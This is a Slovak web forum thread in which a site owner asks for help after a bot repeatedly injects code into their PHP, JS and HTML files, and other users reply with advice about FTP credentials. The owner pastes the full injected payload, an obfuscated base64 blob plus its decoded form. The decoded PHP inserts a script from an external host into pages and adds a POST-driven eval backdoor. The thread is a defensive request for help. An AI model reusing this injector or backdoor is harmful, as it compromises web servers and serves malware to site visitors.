[ Príspevkov: 5 ] 
AutorSpráva
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 11.10.09
Prihlásený: 06.08.10
Príspevky: 11
Témy: 6 | 6
NapísalOffline : 05.11.2009 8:46 | Skodlivy kod vkladany do stranok

Zdravim vsetkych, mam dost Vazny problem so strankami. Tie su tvorene tak, ze priblizne 95% vsetkych stranok volam do indexu.php z databazy prikazom
Kód:
<?php
if(file_exists(intval("./".$_GET['id']).".php"  ))
include intval($_GET['id']).".php";
else
echo "<br /><h1>Stránka nejestvuje</h1>";
?>

Vsetko fungovalo super skoro dva roky. Teraz nejaky robot vklada do mojho suboru index.php tento kod
Kód:
<?php eval(base64_decode('aWYoIWlzc2V0KCRkNzQxKSl7ZnVuY3Rpb24gZDc0KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/
Twvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk
+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2g
oJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygk
diwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2L
CcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/8oW14+XSo/
KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/4nPicpKSRzPXByZWdfcm
VwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1
iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM1J6ZFd0aGFYTjFkR1ZqYjI1MFlXTjBMbU52YlM5cGJ
XRm5aWE12WjJsbWFXMW5MbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKS
RzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuP
SRhO3JldHVybiAkczt9ZnVuY3Rpb24gZDc0MigkYSwkYiwkYywkZCl7Z2xvYmFsICRkNzQxOyRzPWFycmF5KCk7aWYoZn
VuY3Rpb25fZXhpc3RzKCRkNzQxKSljYWxsX3VzZXJfZnVuYygkZDc0MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V
0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkNzQnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRs
ZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk
9Y291bnQoJHMpLTE7JGkPTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGF
ydCgnZDc0Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1
bMV07fX19JGQ3NGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2Q3NDInKSkhPSdkNzQyJyk/6MDtldmFsKGJhc2U2NF9
kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>


odkodovane to je

Kód:
<?php
if(!isset($d741)){function d74($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3RzdWthaXN1dGVjb250YWN0LmNvbS9pbWFnZXMvZ2lmaW1nLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function d742($a,$b,$c,$d){global $d741;$s=array();if(function_exists($d741))call_user_func($d741,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='d74')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('d74');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$d74l=(($a=@set_error_handler('d742'))!='d742')?$a:0;eval(base64_decode($_POST['e']));
?>


to sposoby chybu v PHP syntache a stranka sa (ne)zobrazi iba ako chybova hlaska PHP.

Neviem ako to moze vkladat ten skodlivy kod do suboru a este aj do js. a html. suborov, ktore mam v adresaroch v nepravidelnzch casovych intervaloch zhruba do 12 hod., ked to prepisem.. ako sa branit proti takemu utoku??
Na serveri som nastavil hodnoty funkcii allow_url_fopen a allow_url_include na Off, co som myslel ze pomoze, ale nic som tym neviriesil. Ako osetrit kod na includovanie udajov z databazy do stranok?
Vopred vdaka za kazdu radu a namet...


Offline

Správca fóra
Správca fóra
Skodlivy kod vkladany do stranok

Registrovaný: 27.07.07
Príspevky: 3971
Témy: 51 | 51
Bydlisko: Bratislava
Vek: 32
NapísalOffline : 05.11.2009 9:13 | Skodlivy kod vkladany do stranok

zmen si heslo na ftp a nepouzivaj "nezabezpeceneho" ftp klienta, pripadne si este skontroluj, ci nemas napadnuty pc nejakou havedou...


_________________
Desktop: CPU: AMD Athlon64 3000+ | MB: Biostar K8T890-A9 | VGA: NVIDIA GeForce 6200 LE 256MB | RAM: 2x 1GB A-DATA DDR 400 MHz Dual Kit | HDD: WD Caviar Blue 320GB | DVD: LG GSA-H10N | Keyboard: Chicony KU-0420 Silver/Black | Mouse: Logitech RX1000 | Zdroj: Corsair CX400 400W | CASE: DELUX DLC-MD370 Black | LCD: 20" Samsung 206BW | Repro: Teac XL-20
Notebook: ACER Aspire 4820TG 14" | CPU: Intel Core i5 2,53 GHz | VGA: ATI Mobility Radeon HD5650 1GB / Intel HD Graphics | RAM: 4GB DDR3 1066 MHz | HDD: 640GB
Offline

Užívateľ
Užívateľ
Skodlivy kod vkladany do stranok

Registrovaný: 19.09.06
Prihlásený: 05.10.17
Príspevky: 752
Témy: 31 | 31
Bydlisko: Ružomberok&...
NapísalOffline : 05.11.2009 9:49 | Skodlivy kod vkladany do stranok

http://forum.security-portal.cz/viewtopic.php?f=58&t=2556
a na konci tohto clanku mas aj vysvetlenie ako moze niekto vkladat kod na stranky kazdych 12 hodin.


Offline

Užívateľ
Užívateľ
Skodlivy kod vkladany do stranok

Registrovaný: 25.05.07
Prihlásený: 06.10.17
Príspevky: 346
Témy: 57 | 57
Bydlisko: Partizanske
Vek: 32
NapísalOffline : 05.11.2009 12:40 | Skodlivy kod vkladany do stranok

mal som podobny problem, potom som zmenil pristupove meno a heslo ineho klienta a nemam problem od tej doby


_________________
Ntbk 1: HP ProBook 640 Ntbk 2: HP Probook 6570b
HTPC: Zotac Zbox BI320,120GB SSD, RAM 3Gb
Konzola: Xbox ONE, 1000Gb
TV: LG 50PK350
Tel 1: BlackBerry Z10 Tel 2: Huawei P9 lite
Offline

Skúsený užívateľ
Skúsený užívateľ
Skodlivy kod vkladany do stranok

Registrovaný: 09.07.08
Prihlásený: 17.01.15
Príspevky: 1586
Témy: 96 | 96
NapísalOffline : 05.11.2009 18:46 | Skodlivy kod vkladany do stranok

Podľa mňa by mal každý kurz a každá kniha o webových technológiách začať kapitolou "prečo neukladať heslá v total commanderi"


_________________
neříkejte, že něco nejde udělat, protože se vždycky najde nějaký blbec, co neví, že to nejde – a udělá to!
 [ Príspevkov: 5 ] 


Skodlivy kod vkladany do stranok



Podobné témy

 Témy  Odpovede  Zobrazenia  Posledný príspevok 
V tomto fóre nie sú ďalšie neprečítané témy.

"Dokonalý" škodlivý kód šifruje súbory a po

v Novinky

5

452

09.06.2008 21:41

renderman

V tomto fóre nie sú ďalšie neprečítané témy.

Avast hlasi "skodlivy kod"

v Antivíry a antispywary

7

518

18.01.2009 19:13

br4n0

V tomto fóre nie sú ďalšie neprečítané témy.

Škodlivý uTorrent

v Ostatné programy

10

250

20.09.2015 19:30

Cyanes

V tomto fóre nie sú ďalšie neprečítané témy.

Skodlivy ucinok CRT monitorov

v Zdravie, medicína, choroby a liečenie

22

2229

01.05.2008 9:19

dsljohn

V tomto fóre nie sú ďalšie neprečítané témy.

AVAST:zablokovany skodlivy URL

v Antivíry a antispywary

10

2130

14.07.2011 13:35

RapidFire

V tomto fóre nie sú ďalšie neprečítané témy.

Ověřovaci kod

v Redakčné systémy

2

385

25.11.2006 15:45

AVAST

V tomto fóre nie sú ďalšie neprečítané témy.

overovací kód

v Ostatné programy

8

985

15.07.2011 18:58

yarka

V tomto fóre nie sú ďalšie neprečítané témy.

Etarget kód

v Internetový marketing, SEO, reklama

11

938

31.05.2008 22:59

davenger

V tomto fóre nie sú ďalšie neprečítané témy.

Overovaci kod

v Redakčné systémy

2

375

14.06.2007 16:34

matoa

V tomto fóre nie sú ďalšie neprečítané témy.

pomoc kod

v PHP, ASP

10

386

24.03.2009 22:18

kaidžas

V tomto fóre nie sú ďalšie neprečítané témy.

neviem kod

v Redakčné systémy

6

696

25.08.2006 13:34

gumy

V tomto fóre nie sú ďalšie neprečítané témy.

Zdrojový kód

v Ostatné

17

365

18.08.2016 12:18

McLovin

V tomto fóre nie sú ďalšie neprečítané témy.

bezpecnostny kod

v PHP, ASP

2

960

11.01.2007 17:30

p360t

V tomto fóre nie sú ďalšie neprečítané témy.

validny kod

v HTML, XHTML, XML, CSS

10

2816

06.11.2009 19:08

Ďuri

V tomto fóre nie sú ďalšie neprečítané témy.

overovaci kod

v Redakčné systémy

2

374

28.03.2007 18:55

xyz

V tomto fóre nie sú ďalšie neprečítané témy.

nefungl kod

v PHP, ASP

4

253

15.10.2007 18:17

bruno.b



© 2005 - 2017 PCforum, edited by JanoF